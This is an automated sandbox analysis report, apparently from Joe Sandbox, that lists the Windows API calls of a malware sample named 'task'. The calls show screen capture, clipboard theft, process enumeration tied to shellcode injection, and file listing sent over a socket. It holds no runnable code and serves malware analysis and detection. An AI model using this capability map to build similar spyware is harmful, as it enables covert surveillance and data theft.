                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0006921B
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00069244
                                                                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0006925B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3260228402-0
                                                                                                                                                                • Opcode ID: 3d2cbabdc6861b65a730f276497d80b2b6043d21d25c72c2964fe047433d1a6f
                                                                                                                                                                • Instruction ID: 5d49f728c3b808827401bc468ebffec62bb1b73d1ada3dc125c8802bad1979e6
                                                                                                                                                                • Opcode Fuzzy Hash: 3d2cbabdc6861b65a730f276497d80b2b6043d21d25c72c2964fe047433d1a6f
                                                                                                                                                                • Instruction Fuzzy Hash: 2D9122329001199BDB15FFA0DC92EED73BABF24314F54426AE406A71A2EF359F49CB50
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 00068295
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,000C2978,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0006834E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00068376
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00068383
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000684E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1771804793-0
                                                                                                                                                                • Opcode ID: 42ac7d3c68e989d9a68d1c8820c679e8edfef54c4a54b24adca28e655dc88001
                                                                                                                                                                • Instruction ID: d9b6e0c9c16862a251a01bcbe0f584f1614f30b3d3c8a8b40975f2050d2dd399
                                                                                                                                                                • Opcode Fuzzy Hash: 42ac7d3c68e989d9a68d1c8820c679e8edfef54c4a54b24adca28e655dc88001
                                                                                                                                                                • Instruction Fuzzy Hash: F27182729001199ADF04FFA0DC56AED77BBAF20310F948269F806A7193EF349B49C791
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A38D4: GetLastError.KERNEL32(00000000,?,00098255,?,?,?,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A38D8
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A390B
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A394C
                                                                                                                                                                  • Part of subcall function 000A38D4: _abort.LIBCMT ref: 000A3952
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A3933
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A3940
                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 000AF370
                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 000AF3CB
                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 000AF3DA
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,000A40B7,00000040,?,000A41D7,00000055,00000000,?,?,00000055,00000000), ref: 000AF422
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,000A4137,00000040), ref: 000AF441
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 745075371-0
                                                                                                                                                                APIs
                                                                                                                                                                • NtWriteFile.NTDLL ref: 6FE7C975
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FE7C985
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6FE7C9A5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                                                                                • String ID: xJo
                                                                                                                                                                • API String ID: 3447438843-2290625176
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0006730B
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 000673CB
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                                                                                • String ID: 8 $8
                                                                                                                                                                • API String ID: 4113138495-398533010
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A124: GetCurrentProcess.KERNEL32(000D2318,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A135
                                                                                                                                                                  • Part of subcall function 0007A124: IsWow64Process.KERNEL32(00000000,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A13C
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0006E47A
                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0006E49C
                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0006E623
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0006E632
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 715332099-0
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6FE91140
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6FE9120C
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE91225
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6FE9122F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                APIs
                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0006B2BB
                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0006B2C7
                                                                                                                                                                • CloseClipboard.USER32 ref: 0006B2CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2058664381-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 000A5131
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                                • Opcode ID: f8c2eda127a20b530770ad5dd18216171965544f246970604ef4eb3ebde2975d
                                                                                                                                                                • Instruction ID: d998e1c5c9c0529712544cd2abd7734393e05f9878c537b8e6854cd61ff69774
                                                                                                                                                                • Opcode Fuzzy Hash: f8c2eda127a20b530770ad5dd18216171965544f246970604ef4eb3ebde2975d
                                                                                                                                                                • Instruction Fuzzy Hash: E3F02431A41608BBEB116FA4DC06FFE7BA5FF49B12F004114FD043A292CB768D209AD4
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A38D4: GetLastError.KERNEL32(00000000,?,00098255,?,?,?,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A38D8
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A390B
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A394C
                                                                                                                                                                  • Part of subcall function 000A38D4: _abort.LIBCMT ref: 000A3952
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000AEF35,00000000,00000000,?), ref: 000AF1C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2692324296-0
                                                                                                                                                                • Opcode ID: 013fc3a15cd5039bff94c4332ef7ebb0a260789787e382331f0fe10f2e91ab84
                                                                                                                                                                • Instruction ID: 5d83da23251cb214ca6570e682870cce62fa0950556c47dc8ac2108e77cee21d
                                                                                                                                                                • Opcode Fuzzy Hash: 013fc3a15cd5039bff94c4332ef7ebb0a260789787e382331f0fe10f2e91ab84
                                                                                                                                                                • Instruction Fuzzy Hash: 7CF0F932A00116FBDB249BE4CC06BFA77A8EB41754F144439EC15A3140EA39BD01C790
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cd74b34ad392a09e22e84705e34531d19268d03eec72c5563b186773a7827bd3
                                                                                                                                                                • Instruction ID: 25e0ee946dc871349302713101d50e8eb5f5e17c382e195faf82d27baf0a397e
                                                                                                                                                                • Opcode Fuzzy Hash: cd74b34ad392a09e22e84705e34531d19268d03eec72c5563b186773a7827bd3
                                                                                                                                                                • Instruction Fuzzy Hash: 7AE0463100050AABDF117F14CE88A8D3F2AFB88262F508428F908AB970CB75DD82CE44
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00077195
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 000771A1
                                                                                                                                                                  • Part of subcall function 000775FE: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00077632
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0007720C
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 00077224
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077227
                                                                                                                                                                • DeleteObject.GDI32(76F90F00), ref: 0007722B
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00077248
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007725B
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0007725E
                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00077282
                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 0007729D
                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 000772B1
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 000772D6
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 000772DF
                                                                                                                                                                • DrawIcon.USER32(?,00000000,00000000,?), ref: 000772EE
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00077319
                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0007733C
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 000773A2
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0007740B
                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0007742B
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007743E
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077441
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00077446
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00077450
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 000774F5
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 000774FC
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007750B
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077516
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                • String ID: DISPLAY
                                                                                                                                                                • API String ID: 4256916514-865373369
                                                                                                                                                                • Opcode ID: 395db98ef48a5290218062df6bbd7a17d9fc2e5e8c4dd37c76e7e4e61e75516e
                                                                                                                                                                • Instruction ID: 5f7af0770e8d873e0eaf294f87af3fdfea9b47598973306ba7a01f0afa3e81b7
                                                                                                                                                                • Opcode Fuzzy Hash: 395db98ef48a5290218062df6bbd7a17d9fc2e5e8c4dd37c76e7e4e61e75516e
                                                                                                                                                                • Instruction Fuzzy Hash: F2C17D71D04219AFEB249FA4CC45BEEBBB5FF08340F008159F909E7291DB79AA45CB54
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6FE7B880
                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6FE7B894
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6FE7B8C7
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetOptions), ref: 6FE7B8F6
                                                                                                                                                                • GetProcAddress.KERNEL32(SymInitializeW), ref: 6FE7B926
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7B942
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6FE7B9C2
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7B9D7
                                                                                                                                                                • lstrlenW.KERNEL32(00000002), ref: 6FE7B9EC
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6FE7BA1D
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6FE7BA9C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6FE7BABF
                                                                                                                                                                • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6FE7BB43
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7BB58
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6FE7BBBD
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7BBD5
                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 6FE7BC19
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                                                                                                                                                • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                                                                                                                                • API String ID: 422451348-356128008
                                                                                                                                                                • Opcode ID: 97c3881b44fc35a42b54e1bb528e21fbca3ee264262941bd5a8de0183db59069
                                                                                                                                                                • Instruction ID: f81f9742aea584391723283cd9b0eb17a742fab1e6ec776edebe1d1b07f75da3
                                                                                                                                                                • Opcode Fuzzy Hash: 97c3881b44fc35a42b54e1bb528e21fbca3ee264262941bd5a8de0183db59069
                                                                                                                                                                • Instruction Fuzzy Hash: 04D1B175D006189FDB20CFA8D88579EBFB5BF06318F208129E815BB384EF759851CB62
                                                                                                                                                                APIs
                                                                                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 000793E5
                                                                                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 000793F9
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,000C2774), ref: 0007941E
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,000D1EC0,00000000), ref: 00079434
                                                                                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00079475
                                                                                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0007948D
                                                                                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 000794A1
                                                                                                                                                                • SetEvent.KERNEL32 ref: 000794C2
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 000794D3
                                                                                                                                                                • CloseHandle.KERNEL32 ref: 000794E3
